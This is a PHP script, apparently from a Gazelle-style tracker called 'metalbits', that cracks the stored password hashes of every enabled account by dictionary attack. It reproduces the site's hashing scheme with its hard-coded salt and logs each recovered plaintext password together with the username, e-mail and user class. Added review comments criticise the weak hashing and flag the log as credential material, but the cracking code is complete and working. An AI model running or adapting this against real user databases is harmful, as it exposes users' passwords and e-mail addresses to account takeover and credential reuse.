bruteforce.phps

#!/usr/bin/php5
<?php
// Offline dictionary check of stored password hashes. The script loads every
// enabled account from the `metalbits` database, then pages through candidate
// strings in the `dictionary`.`md5` table and logs each candidate whose hash
// equals a stored passhash.
//
// Hash construction being reproduced (kept from the original as a reference):
// return sha1(md5($Secret).$Str.sha1($Secret).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}');
//
// NOTE(review): the construction is a single pass of MD5/SHA-1 over the
// per-user secret, the password and a fixed suffix kept in source code. It has
// no work factor, and the suffix stops being secret once the code is readable.
// Password storage should use password_hash()/password_verify() instead.

// $steptime is reset after every chunk and feeds the ETA below; $start is not
// read again in this part of the file.
$start = $steptime = time();
// Remove the execution time limit for this run.
set_time_limit(0);
// NOTE(review): memory_limit is a bare word here, not a quoted string. PHP 5
// falls back to the string 'memory_limit' with a notice; PHP 8 raises an Error
// for an undefined constant.
ini_set(memory_limit, '100M');
// Legacy mysql_* extension (removed in PHP 7.0); connects to localhost with an
// empty user name and an empty password.
mysql_connect('localhost', '','');
mysql_select_db('metalbits');

// Start at word # (first command-line argument; anything that is not all
// digits falls back to 0)
if(ctype_digit($argv[1])) {
    $step = $argv[1];
} else { $step = 0; }

// Fetch # words at a time (second command-line argument; anything that is not
// all digits falls back to 1000)
if(ctype_digit($argv[2])) {
    $chunk = $argv[2];
} else { $chunk = 1000; }

// Load username, passhash, per-user secret, email and class of every enabled
// account into memory.
$users = array();
$res = mysql_query('SELECT username, passhash, secret, email, class FROM users_main WHERE enabled="1"') or die(mysql_error());
while($row = mysql_fetch_assoc($res)) {
    $users[] = $row;
}
mysql_free_result($res);
$collected = count($users);
echo "Users collected: $collected\n";

// Switch to the candidate table and read its total row count; join('') turns
// the single-column result row into a string.
mysql_select_db('dictionary');
$words = join('',mysql_fetch_row(mysql_query('SELECT COUNT(*) FROM md5')));

// Page through the candidate table, $chunk rows per iteration.
while($step <= $words) {
    $wordlist = array();
    // $step and $chunk are either ctype_digit()-checked arguments, the integer
    // defaults, or sums of those, so the concatenated LIMIT clause carries no
    // free-form input.
    $limit = ' LIMIT '.$step.','.$chunk;
    $res = mysql_query('SELECT str FROM md5'.$limit) or die(mysql_error());
    while($row=mysql_fetch_row($res)) {
        $wordlist[] = join('',$row);
    }
    // Progress in percent.
    // NOTE(review): divides by $words, so an empty md5 table makes this a
    // division by zero.
    $prog = round((($step/$words)*100),2);
    $chunks = (($words - $step) / $chunk); // Total amount of wordlist chunks left
    // ETA estimate: seconds spent since the previous chunk started, multiplied
    // by the number of chunks left.
    $timeleft = (time()-$steptime)*$chunks;
    $eta = time_diff(time(), time()+$timeleft, 2);
    $steptime = time();
    echo "Fetched words $step to ".($step+$chunk)." of $words, got: ".count($wordlist)." - progress($prog%) users left(".count($users).") eta($eta)\n";
    // Hash every candidate with each account's secret and compare the result
    // with the stored passhash.
    foreach($wordlist as $word) {
        for($u=0, $size = sizeof($users); $u < $size; ++$u) {
            $user = $users[$u];
            // NOTE(review): == is a loose comparison; PHP compares two
            // numeric-looking strings as numbers, so digests should be compared
            // with === or hash_equals().
            if($user['passhash'] == sha1(md5($user['secret']).$word.sha1($user['secret']).';Sgv(dTUf&e9+eJrMx(.eL=;Xbf[mSD}')) {
                // The logged line holds the plaintext password together with
                // the username, e-mail address and class; the output is
                // credential material and needs to be handled as such.
                writeLog("User: $user[username] Pass: $word Email: $user[email] Class: $user[class]");
                // Drop the matched account from the working set.
                unset($users[$u]);
            }
        }
    }
    // Advance to the next page and release the current one.
    $step = $step + $chunk;
    unset($wordlist);
}

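/**
 * Record one line in bruteforce.log and, optionally, on standard output.
 *
 * The original passed the unchecked result of fopen() to fwrite()/fclose(),
 * which turns an unwritable log into a TypeError on PHP 8 (a string of
 * warnings on PHP 5). The file is now appended with file_put_contents(), which
 * reports a failure as a warning plus a false return, so the echo below still
 * runs. LOCK_EX keeps concurrent runs from interleaving partial lines.
 *
 * The caller in this file passes lines that contain plaintext passwords and
 * e-mail addresses, so bruteforce.log is credential material: keep it out of
 * web-served directories and restrict who can read it.
 *
 * @param string $str  Line to record; a newline is appended.
 * @param string $type 'both' (default) appends to the file and echoes,
 *                     'file' appends to the file only; any other value
 *                     does nothing.
 * @return void
 */
function writeLog($str, $type='both') {
    if ($type === 'both' || $type === 'file') {
        // Best-effort append: a failure is reported by PHP as a warning.
        file_put_contents('bruteforce.log', $str."\n", FILE_APPEND | LOCK_EX);
    }
    if ($type === 'both') {
        echo "$str\n";
    }
}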

/**
 * Render the span between two Unix timestamps as a compact string such as
 * "1h1m" or "2d1h".
 *
 * Units are tried from largest to smallest (Y, M, w, d, h, m, then s when
 * $ShowSeconds is set); a unit is printed only when its count is above zero,
 * and at most $Levels units are printed.
 *
 * @param int        $PastTime    Earlier timestamp. A value that date() formats
 *                                as '1999-11-30 00:00:00' yields 'Never'.
 * @param int|string $FutureTime  Later timestamp; '' means "now".
 * @param int        $Levels      Maximum number of units in the result.
 * @param bool       $ShowAgo     Accepted for compatibility; has no effect.
 * @param bool       $ShowSeconds Whether leftover seconds may be printed.
 * @param int        $Time        Span in seconds; when non-zero it replaces
 *                                $FutureTime - $PastTime.
 * @return string|false 'Never', 'N/A' when no unit qualifies, the formatted
 *                      span, or false when $FutureTime precedes $PastTime.
 */
function time_diff($PastTime,$FutureTime='',$Levels=2, $ShowAgo = false, $ShowSeconds = false, $Time = 0) {
    // Sentinel timestamp that stands for "no date".
    if (date('Y-m-d H:i:s', $PastTime) == '1999-11-30 00:00:00') {
        return 'Never';
    }

    if ($FutureTime == '') {
        $FutureTime = time();
    }
    if ($FutureTime < $PastTime) {
        return false;
    }

    // An explicit span wins over the difference of the two timestamps.
    $Remaining = $Time ? $Time : $FutureTime - $PastTime;

    // Unit length in seconds => suffix, largest unit first.
    $Units = array(
        array(31556926, 'Y'), // year
        array(2629744, 'M'),  // month
        array(604800, 'w'),   // week
        array(86400, 'd'),    // day
        array(3600, 'h'),     // hour
        array(60, 'm'),       // minute
    );

    $Parts = array();
    foreach ($Units as $Unit) {
        list($Length, $Suffix) = $Unit;
        $Count = floor($Remaining / $Length);
        $Remaining = $Remaining - $Count * $Length;
        if ($Count > 0 && $Levels > 0) {
            $Parts[] = $Count.$Suffix;
            $Levels--;
        }
    }

    // Whatever is left after the minutes is the seconds part.
    if ($ShowSeconds && $Remaining > 0 && $Levels > 0) {
        $Parts[] = $Remaining.'s';
        $Levels--;
    }

    if (count($Parts) == 0) {
        return 'N/A';
    }
    return implode('', $Parts);
}

?>